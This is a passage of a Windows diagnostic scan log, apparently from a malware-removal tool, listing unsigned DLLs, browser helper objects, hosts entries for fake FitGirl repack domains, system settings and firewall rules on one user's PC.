2020-10-05 22:07 - 2020-01-31 09:31 - 000008704 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._ARC4.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000019968 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._Blowfish.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000054784 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._DES3.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000009728 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Random.OSRNG.winrandom.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000010240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Util._counter.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000007680 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Util.strxor.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000039936 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\psutil._psutil_windows.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000142336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pyexpat.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000008704 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.Qt.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 001721856 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtCore.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 001804288 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtGui.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000503808 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtNetwork.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000099840 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtOpenGL.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000193024 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtPrintSupport.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000320512 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtQml.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000416768 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtQuick.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000180224 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSensors.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000057344 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSerialPort.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000243200 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSql.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000086528 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSvg.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000065024 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtTest.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000117760 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWebKit.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000215040 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWebKitWidgets.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 003975168 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWidgets.pyd
2020-10-05 22:07 - 2016-01-11 22:46 - 000396800 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pythoncom27.dll
2020-10-05 22:07 - 2016-01-11 22:44 - 000110080 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pywintypes27.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000032256 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qdds.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000021504 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qgif.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000027648 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qicns.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000020992 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qico.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000381952 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qjp2.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000204800 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qjpeg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000218112 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qmng.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000015872 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qsvg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000015360 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qtga.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000307712 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qtiff.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000014848 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qwbmp.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000252928 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qwebp.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000877056 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\platforms\qwindows.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000010240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\select.pyd
2020-10-05 22:07 - 2020-10-03 04:52 - 000078848 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\sip.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000634368 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\sqlite3.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000687104 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\unicodedata.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000099328 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32api.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000024576 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32cred.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000017408 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32event.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000118784 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32file.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000035840 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32process.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000107520 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32security.pyd
2020-10-05 22:07 - 2016-06-27 17:25 - 000121344 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\_ctypes.pyd
2020-10-05 22:07 - 2016-06-27 17:26 - 000051712 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\_socket.pyd
2020-10-05 22:07 - 2020-10-03 04:52 - 000712578 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000714980 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000712586 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll
2020-10-05 22:07 - 2016-01-11 22:54 - 000548864 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\pythoncom27.dll
2020-10-05 22:07 - 2016-01-11 22:52 - 000137728 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\pywintypes27.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000712582 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll
2020-10-05 22:07 - 2016-06-27 17:25 - 000693248 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\unicodedata.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000130560 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32api.pyd
2020-10-05 22:07 - 2016-01-11 22:57 - 000522240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32com.shell.shell.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000223744 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32gui.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000017920 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32trace.pyd
2019-11-02 12:44 - 2019-11-02 12:44 - 098275328 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll
2019-11-02 12:44 - 2019-11-02 12:44 - 000092672 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll
2019-11-02 12:44 - 2019-11-02 12:44 - 003922432 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004110848 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Core.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004346368 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Gui.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000544768 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Multimedia.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000084992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5MultimediaWidgets.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000849408 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Network.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000266240 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5OpenGL.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000155648 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Positioning.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000262144 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5PrintSupport.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 002522624 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Qml.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 002236928 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Quick.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000143872 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Sensors.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000056320 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5SerialPort.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000152576 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Sql.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000203776 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Svg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000118784 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Test.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 017492992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5WebKit.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000193536 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5WebKitWidgets.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004372992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Widgets.dll
2016-05-04 19:08 - 2015-12-31 16:15 - 000077312 _____ (Igor Pavlov) [File not signed] D:\Programy\7-Zip\7-zip.dll
2017-09-28 19:41 - 2017-09-28 19:41 - 000266240 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2017-12-11 22:18 - 2015-02-27 11:35 - 000489984 _____ (Newtonsoft) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\Newtonsoft.Json.dll
2020-10-05 22:07 - 2020-04-20 15:19 - 002649600 _____ (Python Software Foundation) [File not signed] C:\Users\Tomika\.odrive\bin\6729\python27.dll
2020-10-05 22:07 - 2016-06-27 17:25 - 003395072 _____ (Python Software Foundation) [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\PYTHON27.DLL
2019-11-02 12:44 - 2019-11-02 12:44 - 000547840 _____ (The Chromium Authors) [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 023507968 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icudt52.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 001798656 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icuin52.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 001304064 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icuuc52.dll
2017-12-11 22:18 - 2017-03-01 11:30 - 000087040 _____ (Wondershare) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppCollect.dll
2017-12-11 22:18 - 2017-03-01 11:30 - 000197632 _____ (Wondershare) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppCommon.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Tomika\AppData\Local\Temp:com.affinity.publisher.1 [241]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2020-08-12] (Microsoft Corporation -> Microsoft Corporation)
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-20] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre-10.0.1\bin\jp2ssv.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2020-08-12] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2020-03-13 10:57 - 000001256 _____ C:\Windows\system32\drivers\etc\hosts
109.94.209.70 fitgirlrepacks.co # Fake FitGirl site
109.94.209.70 fitgirl-repacks.cc # Fake FitGirl site
109.94.209.70 fitgirl-repack.com # Fake FitGirl site
109.94.209.70 www.fitgirlrepacks.co # Fake FitGirl site
109.94.209.70 www.fitgirl-repacks.cc # Fake FitGirl site
109.94.209.70 www.fitgirl-repack.com # Fake FitGirl site

2016-05-06 18:24 - 2016-06-16 16:34 - 000000511 _____ C:\Windows\system32\drivers\etc\hosts.ics
5 13 16 50 17 837
192.168.137.1 Tom.mshome.net # 2021 5 3 5 21 35 24 561

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Python37-32\Scripts\;C:\Program Files (x86)\Python37-32\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Windows\Microsoft.NET\Framework\v2.0.50727;D:\Programy\LLVM\bin;C:\Program Files\dotnet\;C:\Program Files\Git\cmd;C:\Program Files (x86)\Mitov\Visuino
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.81.1 - 213.46.172.38
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

Network Binding:
=============
Ethernet: Npcap Packet Driver (NPCAP) -> insecure_npcap (enabled)

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "Adobe ARM"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKLM\...\StartupApproved\Run32: => "SwitchBoard"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{9AD01E6D-EDE0-4C26-8794-C1ACDF29844C}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [UDP Query User{A737DDAD-B775-42F7-969B-B54749BB548F}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [{C0BFCA61-6769-4387-99FB-313A10D98354}] => (Allow) LPort=1542
FirewallRules: [{F504ABC0-A8FD-4D88-872C-BFB0357F7DDB}] => (Allow) LPort=1542
FirewallRules: [{1F8EB603-5FF8-4688-8E08-79E2DA138F65}] => (Allow) LPort=53
FirewallRules: [TCP Query User{3462722B-DE6F-4647-9F68-0E5009544BFA}D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe] => (Allow) D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe () [File not signed]
FirewallRules: [UDP Query User{2CF8A8C3-A1C3-4199-99CC-D51EB01C5B64}D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe] => (Allow) D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe () [File not signed]
FirewallRules: [{9CADBC3E-64E4-40F6-A8F6-C6D24135B717}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{79C6053B-6247-46D6-8E3B-B95FBFDE571A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{18774EFC-EDAD-4F19-BCE4-BA023A4A898E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{1F714EF3-F860-426A-A9EC-0A32EDC7BC3A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{40D21C12-D563-4D39-B50E-056DD7852CFD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{EB44BCFA-7554-4888-93B9-456144AA6ED0}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{440F975A-77E6-4DC1-857F-5D47B5EF6175}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{3B0A6297-0985-4D08-8FD1-99DB730EFBBD}] => (Allow) D:\Programy\steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{E318FA87-164F-4371-9CD7-830A02EA7E57}] => (Allow) D:\Programy\steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{8085AEA6-DBC3-4EDC-8B9C-6C73487D5161}] => (Allow) D:\Programy\steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{710EA0F8-1658-43F9-8E62-A185324EE35E}] => (Allow) D:\Programy\steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{84F54D52-BF8C-4DE7-B761-67F42861E894}] => (Allow) D:\Programy\wolfram mathematica 11\Mathematica.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{DAB6E844-69B2-4A0D-B4D7-FEA33AE13AA0}] => (Allow) D:\Programy\wolfram mathematica 11\Mathematica.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{52570D7A-3FDB-47AC-96E1-1CD4749A6AC5}] => (Allow) D:\Programy\wolfram mathematica 11\MathKernel.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{72C16DE6-5F6E-4C7A-A05A-D8E6CA5BDD48}] => (Allow) D:\Programy\wolfram mathematica 11\MathKernel.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{64C1867B-06C3-4F4D-BFEE-BFD5E8FD454A}] => (Allow) D:\Programy\wolfram mathematica 11\math.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{536FD2FD-654E-4B01-BA28-18CAB6CC6173}] => (Allow) D:\Programy\wolfram mathematica 11\math.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{86092937-B01E-44C7-98CA-78F067D83097}] => (Allow) D:\Programy\PotPlayer\PotPlayerMini64.exe (Kakao corp. -> Kakao)
FirewallRules: [{D822C388-756D-419B-A32F-077778123373}] => (Allow) D:\Programy\PotPlayer\PotPlayerMini64.exe (Kakao corp. -> Kakao)
FirewallRules: [{9483F894-9CD7-40D9-97A4-9A254B38B2E2}] => (Allow) D:\Programy\Mr DJ\Call of Duty 2\CoD2SP_s.exe () [File not signed]
FirewallRules: [{4B073B04-BB23-4AF4-9D01-18F6A857C5A5}] => (Allow) D:\Programy\Mr DJ\Call of Duty 2\CoD2SP_s.exe () [File not signed]
FirewallRules: [{3F5D3EC2-8C07-48A9-A1E7-549AA8E798EF}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\AssassinsCreedIIGame.exe (Ubisoft Entertainment -> )
FirewallRules: [{DC89694B-B938-4F52-AE55-815B8176FEF1}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\AssassinsCreedIIGame.exe (Ubisoft Entertainment -> )
FirewallRules: [{45D9FC93-D3D0-492B-8F49-63DB88E81B86}] => (Allow) D:\Programy\steam\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{D2F17CF0-FBCA-441F-8FDE-A97D1AFED72C}] => (Allow) D:\Programy\steam\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{1A7722A8-6C68-4E08-9654-EE38A7DE4A6C}] => (Allow) D:\Programy\steam\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{1B1A54D2-02ED-4791-BF2F-EDD3B463C46E}] => (Allow) D:\Programy\steam\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{C42697B3-7F4A-437C-B4B8-74107E0DFCD7}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{90D1047B-2E4D-46BB-B7E8-DF05DF213F14}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{0175C92F-A1AD-4D10-8E4C-CF3D2DD72C44}] => (Allow) D:\Programy\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{58B05CB9-C375-4D64-8906-28E5F17E4EE8}] => (Allow) D:\Programy\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{C967F151-1891-4F21-86EB-ECF7811CD148}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{DE3B2D5D-EBE7-4127-8B80-E91C3EA67D63}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{526DDF0E-F163-44E3-8E56-F8608F65A9F8}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
